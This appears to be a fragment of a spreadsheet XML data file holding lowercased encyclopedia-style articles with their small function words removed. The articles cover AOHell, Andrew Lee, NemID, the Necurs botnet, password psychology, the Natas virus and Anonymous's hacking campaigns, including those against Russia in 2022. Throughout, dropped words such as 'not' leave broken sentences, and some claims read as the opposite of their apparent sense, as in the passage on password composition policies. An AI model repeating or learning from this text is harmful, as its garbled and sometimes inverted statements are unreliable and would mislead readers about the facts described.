software even allowed develop warez community. lurking secret chat rooms names 'airzeraw', cerver, 'warezxxx', g00dz, 'punter', 'gif', 'coldice', 'grip', 'trade', aohell created bots, often referred 'servers', would send list warez (illegally copied software) contained mailbox. simply messaging titles desired software packaging would result packages forwarded one's mailbox. since data merely copied another user's mailbox (while still residing server), piracy limited fast messages could forwarded, paying cost bandwidth. additional limitation included allotted number email messages could sent particular user account. botters able circumvent limitation signing white-list account subjected unknown probationary period administrators monitored account. existence software like aohell provided parallel 'lite' version hacker underground existed years before, based around bulletin board systems. programs like aohell played important part defining 'script kiddie', user performs basic cracking using simple tools written others, little understanding doing. these types programs tendency accounts banned; users logged accounts acquired illicitly, either phishing fake account generator. manual, creator aohell claims created program administrators would frequently shut hacker warez chatrooms violation aol's terms service refusing shut pedophilia chat rooms regularly traded child pornography. chronic" claimed confronted aol's tosadvisor account deletion: constantly closed "hackers" member room, refuses anything pedophilia rooms. imed tosadvisor asked closes hacker room, close kiddie porn rooms. reply, instead cancelled account. guess aol's priorities lie. also stated goal was: have] 20,000+ idiots using aohell knock people offline, steal passwords credit card information, basically annoy hell everyone. program last compatible version 2.5. references further reading simson garfinkel (1995-04-21). "aohell". boston globe. (scan) wallace wang (2003-01-01). "aohell". steal this computer book starch press. 297. isbn 1-59327-000-3. external links manual aohell v3.0 interview chronic, creator aohell</t>
  </si>
  <si>
    <t>Andrew Lee (entrepreneur)</t>
  </si>
  <si>
    <t>andrew (born december 1983) korean-american entrepreneur. founder service private internet access, started 2010. career 2009, founded london trust media (ltm), private holdings company. 2010, founded private internet access (pia), virtual private network service anonymizing internet traffic. started interest internet relay chat (irc), whose users' addresses could easily revealed. co-owner steve deprospero sold (and subsidiary pia) israeli company kape technologies us$95.5 million november 2019. co-founded live, bitcoin price tracker later acquired now-defunct bitcoin exchange gox.in 2017, christel dahlskjaer, head staff freenode, incorporated transferred ownership freenode limited lee; dahlskjaer said company solely funding network running freenode #live conferences. according staff, informed contents deal told would affect freenode's day-to-day operations, company managed conference nothing else. dispute changes imposed 2021 resulted freenode's twenty thirty staff members resigning. this team went form network called libera chat. personal life andrew born indianapolis, indiana, united states, raised carmel, indiana, city indianapolis metro. enrolled purdue university transferred university buffalo, later dropped start work.in october 2018, seok, member house pretenders defunct imperial throne korea, declared crown prince korea ceremony angeles, attended bermuda premier david burt, city officials angeles jeonju.in 2020, family moved mansion hidden valley, thousand oaks, california. references</t>
  </si>
  <si>
    <t>NemID</t>
  </si>
  <si>
    <t>nemid (literally: easyid) common log-in solution danish internet banks, government websites private companies. nemid managed nets danid company came july 2010. everyone denmark years cpr-number eligible nemid used bank well public institutions. anyone years nemid internet banking. users nemid assigned unique number used username addition cpr-number user-defined username. users receive card containing pairs numbers, similar transaction authentication numbers. after logging username password, nemid users prompted enter corresponding number part nemid's two-factor authentication scheme. these private keys time only. after used user must private keys, generally sent user mail they're out. private keys kept central server. this caused criticism security nemid system.unlike web-based single sign-on solutions, google's facebook's, nemid based cryptographical guarantee. while security example google's single sign-on based https, domain name accounts.google.com browser's address line ensure send password google (trusted third party), nemid based inputting nemid-password arbitrary webpages show something looks like nemid password dialog, hoping pages steal nemid-password. nemid legally binding signature, gives access bank accounts, protects much personal information, lack cryptographical security criticized. there appear concrete reason nemid designed cryptographical guarantee.on april 2013, nemid system shut response ddos attack, causing widespread chaos denmark internet banking possible attack. with java version 1.7.0_45, nemid java applet able users nemid 2018, digitaliseringsstyrelsen finans danmark launched nemid smartphones, supplement nemid cards nemid code tokens. also digital signature net-id references external links forbrugerrådets page nemid danish) nemid opposition danish)</t>
  </si>
  <si>
    <t>Necurs botnet</t>
  </si>
  <si>
    <t>necurs botnet distributor many pieces malware, notably locky. reports around june 2016, botnet went offline, perhaps glitch command control server running necurs. however, three weeks later, french appriver discovered spike spam emails, signifying either temporary spike botnet's activity return normal pre-june state. distributed malware bart dridex locky rockloader globeimposter also conficker command control (malware) gameover zeus operation tovar timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science) references</t>
  </si>
  <si>
    <t>Password length parameter</t>
  </si>
  <si>
    <t>telecommunication, password length parameter basic parameter value affects password strength brute force attack contributor computer security. password length parameters expression {\displaystyle p=l\times r/s} {\displaystyle probability password guessed lifetime, {\displaystyle maximum lifetime password used system, {\displaystyle number guesses unit time, {\displaystyle number unique algorithm-generated passwords (the 'password space'). degree password security determined probability password guessed lifetime. also stretching password cracking references this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Naming Context</t>
  </si>
  <si>
    <t>active directory naming context (nc) directory partition, logical portion microsoft's active directory (ad). description naming context active directory support tens millions objects. scale objects, active directory database divided partitions replication administration. each logical partition replicates changes separately among domain controllers forest. some directory partitions store forest wide configuration information schema information; directory partitions store information specific individual domains, users, groups, organizational units. default naming contexts default, active directory domain service contains following naming contexts: schema stores schema information replicated domain controllers domains forest. configuration stores topology configuration data information replicated domain controllers domains forest. domain store domain information users computers replicated domain controllers domain only. references active directory naming contexts (directory partitions)</t>
  </si>
  <si>
    <t>Anonymous and the 2022 Russian invasion of Ukraine</t>
  </si>
  <si>
    <t>anonymous, decentralized international activist hacktivist collective, conducted numerous cyber-operations russia ever since 2022 russian invasion ukraine. prelude starting late 2021, anonymous took notice military build-up near russia-ukraine border thus acted propagate peace plans donbass defacing various websites, united nations' networks migration, polar research institute china, convention biological diversity, various government websites china.in hacking campaign named "operation samantha smith", reference 1980s child peace activist, called referendum ukraine whether presumably follow now-defunct minsk protocol hand separatist-controlled territories peacekeeping administration. later, second referendum separatist regions would voters choose reunite ukraine, gain independence, join russia. besides that, also called creation "neutral grouping" countries "wedged nato russia" would include ukraine, finland, belarus, georgia, armenia, azerbaijan, moldova. anonymous argued so-called "neutral security belt" could serve alliance similar north atlantic treaty organisation (nato) collective security treaty organization (csto) acts cordon sanitaire nato csto countries order "assuage russia's fears without nato losing face."as situation escalated, threatened take hostage industrial control systems implicitly warned russia "sole party blamed escalate that, started first place troop buildups, childish threats, waves unreasonable ultimatums." furthermore urged united nations immediately deploy peacekeepers least ukrainian side frontline donbass" basis resolution "prevent provocations" side.in aftermath russia's recognition donetsk people's republic luhansk people's republic accordance hacking collective's threats take hostage industrial control systems, conducted small hack russian modbus device they've announced hacked chinese cultural website, although early anonymous kept location hack ambiguous. according anonymous, modbus device said schneider electric's modicon m251 logic controller, previously "playing nice" give russia casus belli subsequent 2022 russian invasion ukraine, operation samantha smith presumably deemed failure anonymous would start attacking russian websites systems retaliation. operation russia february 2022, twitter accounts associated anonymous declared launched 'cyber operation' russian federation, retaliation invasion ukraine ordered russian president vladimir putin. operation dubbed "oprussia". group later temporarily disabled websites rt.com website defence ministry along state owned websites. anonymous also leaked worth emails belarusian weapons manufacturer tetraedr, provided logistical support russia russian invasion ukraine. anonymous also hacked russian channels played ukrainian music showed uncensored news happening ukraine.they hacked russian center protection monuments website (memorials.tomsk.ru) uploaded three defacement pages adorned blue yellow colors ukrainian flag. first defacement page, included standard anonymous logo, music video mandopop song fragile, brief announcement operation samantha smith morphed operation russia operation ukraine warned must" following russian military invasion, photo ukrainian revolutionary nestor makhno.following threats operation samantha smith, anonymous also hacked chinese simatic programmable logic controller along russian modbus devices. memes social-networking website reddit appeared defaced website, including image russian president vladimir putin heavy makeup rainbow background, together series embedded reddit posts asked users vote parts russia declare independence. next, appearing hacked website ukrainian national anthem, ukrainian coat arms appearing show kuomintang plans invasion china soviet union.in second defacement page uploaded anonymous memorials.tomsk.ru, photos names deceased passengers malaysia airlines flight shown, third defacement page, anonymous logo, fawkes mask image, video plays circus theme song "entrance gladiators" loop hours appeared. interview, spokesperson hacking collective emphasized "anonymous group, country, amorphous idea. flows like air, like water, like everything. known since inception, anonymous never restrictions homo sapiens part it.", threatening cyberattacks "precipitated russia's continued failure recognizing territorial aggression nothing relic dark ages distant past."besides posting ukrainian president volodymyr zelenskyy's defiant speech invasion video calling creation neutral grouping countries nato russia memorials.tomsk.ru, anonymous announced hacked russian linux terminal control system north ossetia, stating almost caused explosion latter, fast-acting human worker. hacking collective also added several hashtags slogans, including "slavaukraini", "#oprussia", "putin #epikfail", "/r/opukraine" control system.anonymous also believed responsible hacking several russian state channels; many users twitter tiktok uploaded videos showing channels playing ukrainian music displaying pro-ukraine images, flags, symbols. furthermore, hacked russian television services order broadcast footage ukraine, systems believed related russian space agency roscosmos defaced website leaked mission files.a yacht allegedly belonging vladimir putin reportedly hacked group changed call sign “fckptn” setting target destination “hell”. furthermore, broadcast troll face picture hacked russian military radio.at least 2,500 russian belarusian targets reportedly hacked anonymous. these included three hundred websites russian government agencies, state media outlets, banks, well websites leading belarusian banks belarusbank, priorbank belinvestbank. furthermore also hacked website belonging chechnya's regional government. they also warned things continue past days, cyber expanded measures massively increased. this final warning entire russian government. don’t mess anonymous.”over russian cameras hacked anonymous anti-putin messages "putin killing children". some cameras live feeds compiled onto website called behindenemylines.live. website, anonymous explains hacks message russia must "pay huge price shameful decision dictator putin attack independent ukraine armed forces." asserted sanctions imposed russia result state collapse worse consequences citizens oligarchy. anonymous stated "150 million russians know truth causes course ukraine" instead steady stream "kremlin propaganda." anonymous stated purposes hacks "spread information russian people" well serve possible reconnaissance tool ukraine. directly addressed russians: want know brainwashed state propaganda, kremlin putin lying you." besides that, emphasized "ukraine controlled nazis" hence ukrainian people need 'free' them." calling popular uprising, vowing receive support rest world.in response seizure ukraine’s zaporizhia nuclear power plant russia, anonymous defaced website rosatom gained access gigabytes data intended leak publicly. furthermore, hacked printers russia spread spread anti-propaganda messages.in aftermath bucha massacre, hacking collective leaked personal information 120,000 russian soldiers ukraine. hacks march 2022, anonymous actors depaixporteur thewarriorpoetz declared twitter hacked russian surveillance cameras broadcast website. they call operation "russian camera dump".on march 2022, anonymous claimed responsibility theft publication worth documents roskomnadzor. released distributed denial secrets (ddosecrets). ddosecrets writes leak: "this dataset released buildup midst aftermath cyberwar hybrid war. therefore, increased chance malware, ulterior motives altered implanted data, false flags/fake personas. result, encourage readers, researchers journalists take additional care data." leak revealed online surveillance system tracking anti-war sentiment "threats" russian stability putin regime.on march 2022, ddosecrets published approximately 22.5 gigabytes emails allegedly central bank russia, allegedly hacked anonymous actor thblckrbbtworld.on march 2022, ddosecrets published gigabytes emails rostproekt, hacked anonymous actor depaixporteur. rostproekt russian construction company. rostproekt hack dubbed "celebration" grand opening now-defunct anonymousleaks, leak site solely leaks anonymous collective.on april 2022, ddosecrets published approximately 79,000 emails transneft, hacked anonymous.on april 2022, ddosecrets published approximately 200,000 emails capital legal services, hacked anonymous actor wh1t3sh4d0w.on april 2022, ddosecrets published 900,000 emails all-russia state television radio broadcasting company (vgtrk), hacked anonymous aligned nb65.on april 2022, ddosecrets published approximately 100,000 emails aerogas, hacked anonymous.on april 2022, ddosecrets published approximately 230,000 emails blagoveshchensk city administration, hacked anonymous.on april 2022, cosmonautics commemorates cosmonaut yuri gagarin's vostok mission space, anonymous-affiliated hacktivist cyber anakin broke five russian websites, specifically russian heavy metal band aria's site, russian hockey site, panerai watch enthusiasts site, basketball team site, educational organization site, defacement pages, messages "glory ukraine! glory defenders" find orcs lack morality disturbing". they also included videos featuring darth vader "star wars" song "the imperial march," online game roblox, disco song "kung fighting", mandopop music video "fragile", performance ukraine's national anthem cellist yo-yo besides that, memes showing characters wearing fawkes mask acronym "a.s.s." stands "anonymous strategic support" shown. hacktivist proposed list "post-war settlement solutions" behalf hacking collective russia; examples included financial compensation victims malaysia airlines flight establishment united nations interim administration occupied territories ukraine, referendum status territories, creation neutral security belt region, monetary reparations least us$70 billion ukraine reconstruction, fulfillment soviet–japanese joint declaration 1956 presumably resolve kuril islands dispute, cession russian antarctic bases countries iran, agreement potential enlargement security council include brazil, south africa india increase minimum number successful veto more, alongside unusual ones pooling funds russia develop novel treatments covid-19 draco (double-stranded activated caspase oligomerizer) long covid experimental treatment drug 007, construct knowledge space, ideally located least middle region asteroid belt within solar system. furthermore, leaked data russian ministry culture.on april 2022, ddosecrets published roughly 495,000 emails technotec, hacked anonymous.on april 2022, ddosecrets published roughly gigabytes emails continent express, russian travel agency, hacked anonymous aligned nb65.on april 2022, ddosecrets published gigabytes emails, files decryption keys gazregion, hacked three different sources around time, including anonymous actor depaixporteur, anonymous affiliated nb65, unnamed actor.on april 2022, ddosecrets published 15,600 emails guov general dept. troops civil construction, hacked anonymous actor depaixporteur.on april 2022, ddosecrets published 250,000 emails worldwide invest, hacked anonymous.on april 2022, ddosecrets published 426,000 emails worldwide invest, hacked anonymous.on april 2022, ddosecrets published 365,000 emails accent capital, hacked anonymous.on april 2022, ddosecrets published nearly 1,100,000 emails alet/алет, hacked anonymous.on 2022, ddosecrets published roughly gigabytes files, emails disk images corpmsp, hacked anonymous aligned nb65.on 2022, victory russia, video-hosting website rutube taken cyberattacks, anonymous claimed responsibility later. furthermore, network battalion (nb65), hacktivist group affiliated anonymous, reportedly hacked russian payment processor qiwi. total 10.5 terabytes data including transaction records customers' credit cards exfiltrated. they infected qiwi ransomwares threatened release customer records.on 2022, ddosecrets published gigabytes emails nikolai knipovich polar research institute marine fisheries oceanography (pinro), hacked anonymous actors depaixporteur b00damooda.on 2022, ddosecrets published 7,000 emails achinsk city government, hacked anonymous.on 2022, ddosecrets published 116,500 emails socar energoresource, hacked anonymous.on 2022, ddosecrets published gigabytes emails metprom group llc, hacked anonymous actors depaixporteur, b00damooda, wh1t3sh4d0w.on june 2022, ddosecrets published 1,000,000 emails vyberi radio, hacked anonymous.on june 2022, ddosecrets published terabyte data, included millions files including emails, court files, client data, classified data, photographs, videos, payment information, rustam kurmaev partners (rkplaw), hacked anonymous actors depaixporteur b00damooda. also references</t>
  </si>
  <si>
    <t>Password psychology</t>
  </si>
  <si>
    <t>living intersection cryptography psychology, password psychology study makes passwords cryptographic keys easy remember guess. order password work successfully provide security user, must kept secret un-guessable; also requires user memorize password. psychology behind choosing password unique balance memorization, security convenience. password security involves many psychological social issues including; whether share password, feeling security, eventual choice whether change password. passwords also reflective personality. those uptight security-oriented choose longer complicated passwords. those feel secure everyday lives never change password. common password password1, point convenience security main concern internet users. history memorization nonsense meaningful alphanumeric material long history psychology beginning hermann ebbinghaus. since then, numerous studies established meaningful nonsense “words” easily forgotten, forgetting curves exponential time. chomsky advocates meaning arising semantic features, leading idea “concept formation” 1930s. current research research done find ways enhancing creating techniques cognitive ability memorization comes password selection. study 2004 indicates typical college student creates different passwords different items, computers, cell phones, email accounts, typical password used items. information type passwords points approximate even split linguistic numeric passwords quarter using linguistic/numeric information. names (proper, nicknames) common information used passwords, dates second common type information used passwords. research also done regarding effect policies force users create secure effective passwords. results study show password composition policy reduces similarity passwords dictionary words. however, policy reduce meaningful information passwords names birth dates, reduce password recycling. memorization problems password psychology directly linked memorization mnemonics. mnemonics devices often used passwords many choose simpler passwords. shown mnemonic devices simple passwords equally easy remember choice convenience plays role password creation. password alternatives order address issues presented memorization security many businesses internet sites turned accepting different types authentication. this authentication could single password, non-text based, biometric, key, multi-factor authentication, cognitive passwords question based. many options expensive, time consuming still require form memorization. thus, businesses individuals still common format single word text-based passwords security protection. common alternative tradition passwords codes biometric authentication. biometric authentication method systems physical and/or behavioral traits unique specific individual authorize access. some popular forms biometric passwords follows: fingerprint, palm prints, iris, retina, voice, facial structure. appeal biometrics form passwords increase security. only person access fingerprints retinal patterns means likelihood hacking decreases significantly. biometric authentication important factors, modules, keep systems accounts compromised: sensor module, feature extraction module, template database, matching module. these sections biometric authentication, involved, create layer protection tradition password option cannot. sensor module responsible getting hold user’s method protection whether fingerprint scan, facial scan, voice. second module, feature extraction, data acquired previous module broken components. template, database module, takes components gathered previously saves virtually. lastly, matching module employed order verify inputted biometric method legitimate. modules record, process, verify biometrics, need different stages, enrollment recognition; within stages sub-stages. enrollment stage entirety four modules working digital version biometric data generated stored. recognition stage sub-sections called verification identification. during verification process systems ensure individual trying gain access stating are. identification process fully identifies individual. though biometric authentication method seen increasingly often, isn’t without issues. biometric system affected similar issues tradition password system has. when user inputs biometric information four things happen. user truly granted access system. conversely, user impersonating someone rejected access. scenarios authentic user rejected access impersonator granted access. this type fraud occur certain individuals share virtually identical voices. instances, initial attempt record biometric data compromised. during modules, user inputted corrupted data. example commonly seen fingerprints individual finger scarred finger record data. these errors introduce possibility insecurity. these issues occur facial recognition. pair twins even people like similar access system, granted access. also password strength password policy password cracking passphrase references</t>
  </si>
  <si>
    <t>Natas (computer virus)</t>
  </si>
  <si>
    <t>natas (satan spelled backwards) computer virus written james gentile, then-18-year-old hacker diego, california went alias "little loc" later "priest". virus made mexican politician wanted mexican elections affecting mexican federal electoral institute (ife) computers floppy disk. description natas memory-resident stealth virus highly polymorphic, affects master boot records, boot sectors diskettes, files .com also .exe programs. history virus first appeared mexico city 1992, spread consultant using infected floppy disks. virus became widespread mexico southwest united states. virus also made side infecting computers united states secret service knocking network offline approximately three days. this investigation priest incorrect suspicion virus specifically targeted government computers.natas also infected computers canada, england, russian federation, venezuela brazil. also computer virus comparison computer viruses references</t>
  </si>
  <si>
    <t>Anonymous (hacker group)</t>
  </si>
  <si>
    <t>anonymous decentralized international activist hacktivist collective movement primarily known various cyberattacks several governments, government institutions government agencies, corporations church scientology. anonymous originated 2003 imageboard 4chan representing concept many online offline community users simultaneously existing "anarchic", digitized "global brain" "hivemind". anonymous members (known anons) sometimes distinguished public wearing fawkes masks style portrayed graphic novel film vendetta. some anons also mask voices voice changers text-to-speech programs. early form, concept adopted decentralized online community acting anonymously coordinated manner, usually toward loosely self-agreed goal primarily focused entertainment. beginning project chanology 2008—a series protests, pranks, hacks targeting church scientology—the anonymous collective became increasingly associated collaborative hacktivism number issues internationally. individuals claiming align anonymous undertook protests actions (including direct action) retaliation copyright-focused campaigns motion picture recording industry trade associations. later targets anonymous hacktivism included government agencies united states, israel, tunisia, uganda others; islamic state; child pornography sites; copyright protection agencies; westboro baptist church; corporations paypal, mastercard, visa, sony. anonymous publicly supported wikileaks occupy movement. related groups lulzsec operation antisec carried cyberattacks u.s. government agencies, media, companies, military contractors, military personnel, police officers, resulting increased attention enforcement toward groups' activities.dozens people arrested involvement anonymous cyberattacks countries including united states, united kingdom, australia, netherlands, spain, india, turkey. evaluations group's actions effectiveness vary widely. supporters called group "freedom fighters" digital robin hoods, critics described cyber lynch-mob" "cyber terrorists". 2012, time called anonymous "100 influential people" world. anonymous' media profile diminished 2018, group re-emerged 2020 support george floyd protests causes. philosophy long-standing political question gone unanswered often tragic consequences social movements. this internet-based, non-extremist, socialist community movement looks answers questions unanswered. internal dissent also regular feature group. website associated group describes internet gathering" loose decentralized command structure operates ideas rather directives". gabriella coleman writes group: ways, impossible gauge intent motive thousands participants, many even bother leave trace thoughts, motivations, reactions. among opinions vary considerably."broadly speaking, anons oppose internet censorship control majority actions target governments, organizations, corporations accuse censorship. anons early supporters global occupy movement arab spring. since 2008, frequent subject disagreement within anonymous whether members focus pranking entertainment serious (and, cases, political) activism. [anonymous] happen group people internet need—just kind outlet wish, able regular society. ...that's less point wish. there's common phrase: lulz.' because anonymous leadership, action attributed membership whole. parmy olson others criticized media coverage presents group well-organized homogeneous; olson writes, "there single leader pulling levers, organizational minds sometimes pooled together start planning stunt." some members protest using legal means, others employ illegal measures ddos attacks hacking. membership open anyone wishes state member collective; british journalist carole cadwalladr observer compared group's decentralized structure al-qaeda: believe anonymous, call anonymous, anonymous." olson, formerly described anonymous "brand", stated 2012 characterized "movement" rather group: "anyone part crowd people, nebulous crowd people, working together things together various purposes."the group's rules include disclosing one's identity, talking group, attacking media. members commonly tagline anonymous. legion. forgive. forget. expect us." brian kelly writes three group's characteristics "(1) unrelenting moral stance issues rights, regardless direct provocation; physical presence accompanies online hacking activity; distinctive brand."journalists commented anonymous' secrecy, fabrications, media awareness pose unusual challenge reporting group's actions motivations. quinn norton wired writes that: "anons reason lie. they weave vast fabrications form performance. then tell truth unexpected unfortunate times, sometimes destroying process. they unpredictable." norton states difficulties reporting group cause writers, including herself, focus "small groups hackers stole limelight legion, defied values, crashed violently law" rather "anonymous’s voices, experimenting ways world". history 4chan raids (2003–2007) name anonymous inspired perceived anonymity users post images comments internet. usage term anonymous sense shared identity began imageboards, particularly board 4chan, dedicated random content raiding websites. anonymous assigned visitors leave comments without identifying originator posted content. users imageboards sometimes jokingly acted anonymous single individual. concept anonymous entity advanced 2004 administrator 4chan image board activated "forced_anon" protocol signed posts anonymous. popularity imageboards increased, idea anonymous collective unnamed individuals became internet meme.users 4chan's board would occasionally join mass pranks raids. raid july 2006, example, large numbers 4chan readers invaded finnish social networking site habbo hotel identical avatars; avatars blocked regular habbo members accessing digital hotel's pool, stating "closed fail aids". future lulzsec member topiary became involved site time, inviting large audiences listen prank phone calls skype. growing traffic 4chan's board, users soon began plot pranks off-site using internet relay chat (irc). these raids resulted first mainstream press story anonymous, report station kttv angeles, california u.s. report called group "hackers steroids", "domestic terrorists", "internet hate machine". encyclopedia dramatica (2004–present) encyclopedia dramatica founded 2004 sherrod degrippo, initially means documenting gossip related livejournal, quickly adopted major platform anonymous parody purposes. safe work site celebrates subversive "trolling culture", documents internet memes, culture, events, mass pranks, trolling events, "raids", large-scale failures internet security, criticism internet communities accused self-censorship gain prestige positive coverage traditional established media outlets. journalist julian dibbell described encyclopedia dramatica site "where vast parallel universe anonymous in-jokes, catchphrases, obsessions lovingly annotated, discover elaborate trolling culture: flamingly racist misogynist content lurks throughout, calculated offend." site also played role anti-scientology campaign project chanology.on april 2011, original site redirected website named internet bore little resemblance encyclopedia dramatica. parts community harshly criticized changes. response, anonymous launched "operation save rescue restore site's content. ecology project made downloadable archive former encyclopedia dramatica content. site's reincarnation initially hosted encyclopediadramatica.ch servers owned ryan cleary, later arrested relation attacks lulzsec sony. project chanology (2008) anonymous first became associated hacktivism 2008 following series actions church scientology known project chanology. january 2008, gossip blog gawker posted video celebrity scientologist cruise praised religion; church responded cease-and-desist letter violation copyright. 4chan users organized raid church retaliation, prank-calling hotline, sending black faxes designed waste cartridges, launching ddos attacks websites.the ddos attacks first carried gigaloader jmeter applications. within days, supplanted orbit cannon (loic), network stress-testing application allowing users flood server packets. loic soon became signature weapon anonymous arsenal; however, would also lead number arrests less experienced anons failed conceal addresses. some operators anonymous channels incorrectly told lied volunteers using loic carried legal risk. during ddos attacks, group anons uploaded youtube video robotic voice speaks behalf anonymous, telling "leaders scientology" "for good followers, good mankind—for laughs—we shall expel internet." within days, video attracted hundreds thousands views.on february thousands anonymous joined simultaneous protests church scientology facilities around world. many protesters wore stylized fawkes masks popularized graphic novel film vendetta, anarchist revolutionary battles totalitarian government; masks soon became popular symbol anonymous. in-person protests church continued throughout year, including "operation party hard" march "operation reconnect" april however, mid-year, drawing fewer protesters, many organizers channels begun drift away project. operation payback (2010) start 2009, scientologists stopped engaging protesters improved online security, actions group largely ceased. period infighting followed politically engaged members (called "moralfags" parlance 4chan) seeking provoke entertainment (trolls). september 2010, group received little publicity year faced corresponding drop member interest; raids diminished greatly size moved largely channels, organizing chan boards, particularly /b/.in september 2010, however, anons became aware aiplex software, indian software company contracted film studios launch ddos attacks websites used copyright infringers, pirate bay. coordinating irc, anons launched ddos attack september shut aiplex's website day. primarily using loic, group targeted recording industry association america (riaa) motion picture association america (mpaa), successfully bringing sites. september future lulzsec member mustafa al-bassam (known "tflow") anons hacked website copyright alliance, anti-infringement group, posted name operation: "payback bitch", "operation payback" short. anons also issued press release, stating: anonymous tired corporate interests controlling internet silencing people’s rights spread information, importantly, right share another. riaa mpaa feign artists cause; thing. eyes hope, dollar signs. anonymous stand longer. network operators beginning shut networks involved ddos attacks, anons organized group servers host independent network, titled anonops. operation payback's targets rapidly expanded include british firm acs:law, australian federation against copyright theft, british nightclub ministry sound, spanish copyright society sociedad general autores editores, u.s. copyright office, website gene simmons kiss. october 2010, total downtime websites attacked operation payback 537.55 hours.in november 2010, organization wikileaks began releasing hundreds thousands leaked u.s. diplomatic cables. face legal threats organization u.s. government, amazon.com booted wikileaks servers, paypal, mastercard, visa service organization. operation payback expanded include "operation avenge assange", anons issued press release declaring paypal target. launching ddos attacks loic, anons quickly brought websites paypal blog; postfinance, swiss financial company denying service wikileaks; everydns, web-hosting company also denied service; website u.s. senator lieberman, supported push services.on december anons launched attack paypal's main site. according topiary, command channel attack, loic proved ineffective, anons forced rely botnets hackers attack, marshaling hijacked computers concentrated assault. security researcher sean-paul correll also reported "zombie computers" involuntary botnets provided attack. topiary states anons "lied press give sense abundance", exaggerating role grassroots membership. however, account disputed.the attacks brought paypal.com hour december another brief period december anonymous also disrupted sites visa mastercard december anons announced intention bring amazon.com well, failed allegedly infighting hackers controlled botnets. paypal estimated damage cost company us$5.5 million. later provided addresses 1,000 attackers fbi, leading least arrests. thursday, december 2013, paypal pleaded guilty taking part attacks. 2011–2012 years following operation payback, targets anonymous protests, hacks, ddos attacks continued diversify. beginning january 2011, anons took number actions known initially operation tunisia support arab spring movements. tflow created script tunisians could protect browsers government surveillance, fellow future lulzsec member hector xavier monsegur (alias "sabu") others allegedly hijacked servers london web-hosting company launch ddos attack tunisian government websites, taking offline. sabu also used tunisian volunteer's computer hack website prime minister mohamed ghannouchi, replacing message anonymous. anons also helped tunisian dissidents share videos online uprising. operation egypt, anons collaborated activist group telecomix help dissidents access government-censored websites. sabu topiary went participate attacks government websites bahrain, egypt, libya, jordan, zimbabwe.tflow, sabu, topiary, ryan ackroyd (known "kayla") collaborated february 2011 cyber-attack aaron barr, computer security firm hbgary federal, retaliation research anonymous threat expose members group. using injection weakness, four hacked hbgary site, used barr's captured password vandalize twitter feed racist messages, released enormous cache hbgary's e-mails torrent file pirate bay. e-mails stated barr hbgary proposed bank america plan discredit wikileaks retaliation planned leak bank america documents, leak caused substantial public relations harm firm well leading u.s. congressman call congressional investigation. barr resigned month.several attacks anons targeted organizations accused homophobia. february 2011, open letter published anonnews.org threatening westboro baptist church, organization based kansas u.s. known picketing funerals signs reading "god hates fags". during live radio current affairs program topiary debated church member shirley phelps-roper, anons hacked organization's websites. after church announced intentions december 2012 picket funerals sandy hook elementary school shooting victims, anons published names, phone numbers, e-mail home addresses church members brought godhatesfags.com ddos attack. hacktivists also circulated petitions church's tax-exempt status investigated. august 2012, anons hacked site ugandan prime minister amama mbabazi retaliation parliament uganda's consideration anti-homosexuality permitting capital punishment.in april 2011, anons launched series attacks sony retaliation trying stop hacks playstation game console. more million sony accounts compromised, sony services qriocity playstation network taken month apiece cyberattacks.in august 2011, anons launched attack bart francisco, dubbed #opbart. attack, made response killing charles hill month prior, resulted customers' personal information leaked onto group's website. when occupy wall street protests began york city september 2011, anons early participants helped spread movement cities boston. october, anons attacked website york stock exchange anons publicly opposed action twitter. some anons also helped organize occupy protest outside london stock exchange 2012.anons launched operation darknet october 2011, targeting websites hosting child pornography. particular, group hacked child pornography site called "lolita city" hosted freedom hosting, releasing 1,589 usernames site. anons also said disabled forty image-swapping pedophile websites employed anonymity network tor. 2012, anons leaked names users suspected child porn site opdarknetv2. anonymous launched #oppedochat campaign twitter 2012 continuation operation darknet. attempt eliminate child pornography internet, group posted emails addresses suspected pedophiles online forum pastebin.in 2011, koch industries website attacked following attack upon union members, resulting website made inaccessible minutes. 2013, member, 38-year-old truck driver, pleaded guilty accused participating attack period minute, received sentence years federal probation, ordered $183,000 restitution, amount koch stated paid consultancy organization, despite denial service attack.on january 2012, u.s. department justice shut file-sharing site megaupload allegations copyright infringement. anons responded wave ddos attacks u.s. government copyright organizations, shutting sites riaa, mpaa, broadcast music, inc., fbi.in april 2012, anonymous hacked chinese government websites, once, protest treatment citizens. they urged people "fight justice, fight freedom, [and] fight democracy".in 2012, anonymous launched operation anti-bully: operation hunt hunter retaliation hunter moore's revenge porn site, anyone up?" anonymous crashed moore's servers publicized much personal information online, including social security number. organization also published personal information andrew myers, proprietor anyone back", copycat site moore's anyone up?"in response operation pillar defense, november 2012 israeli military operation gaza strip, anons took hundreds israeli websites ddos attacks. anons pledged another "massive cyberassault" israel april 2013 retaliation actions gaza, promising "wipe israel internet". however, ddos attacks caused temporary disruptions, leading cyberwarfare experts suggest group unable recruit hire botnet operators attack. 2013 november 2013, anonymous protesters gathered around world million mask march. demonstrations held cities around world coincide fawkes night.operation safe winter effort raise awareness homelessness collection, collation, redistribution resources. this program began november 2013 online call action anonymous three missions using charity framework suggested original global spawning variety direct actions used clothing drives pitch community potlucks feeding events turkey. #opsafewinter call action quickly spread mutual communities like occupy wall street offshoot groups like open-source-based occuweather. with addition long-term mutual communities york city online hacktivists took additional three suggested missions. encouraging participation general public, operation raised questions privacy changing nature anonymous community's monikers. project support living streets causing division online network able partner many efforts organizations traditionally associated anonymous online activists. 2014 wake fatal police shooting unarmed african-american michael brown ferguson, missouri, "operation ferguson"—a hacktivist organization claimed associated anonymous—organized cyberprotests police, setting website twitter account group promised protesters harassed harmed, would attack city's servers computers, taking offline. city officials said e-mail systems targeted phones died, internet crashed city hall. prior august members anonymous corresponding mother jones said working confirming identity undisclosed police officer shot brown would release name soon did. august anonymous posted twitter feed claimed name officer involved shooting. however, police said identity released anonymous incorrect. twitter subsequently suspended anonymous account service.it reported november 2014, anonymous declared cyber klux klan (kkk) previous week, made death threats following ferguson riots. they hacked kkk's twitter account, attacked servers hosting sites, started release personal details members.on november 2014, anonymous shut cleveland city website posted video tamir rice, twelve-year-old armed gun, shot death police officer cleveland park. anonymous also used beenverified uncover phone number address police officer involved shooting. 2015 january 2015, anonymous released video statement twitter condemning attack charlie hebdo, people, including eight journalists, fatally shot. video, claiming message al-qaeda, islamic state terrorists", uploaded group's belgian account. announcement stated "we, anonymous around world, decided declare you, terrorists" promises avenge killings "shut[ting] accounts social networks." january brought website suspected belong groups. critics action warned taking extremists' websites would make harder monitor.on june 2015, anonymous claimed 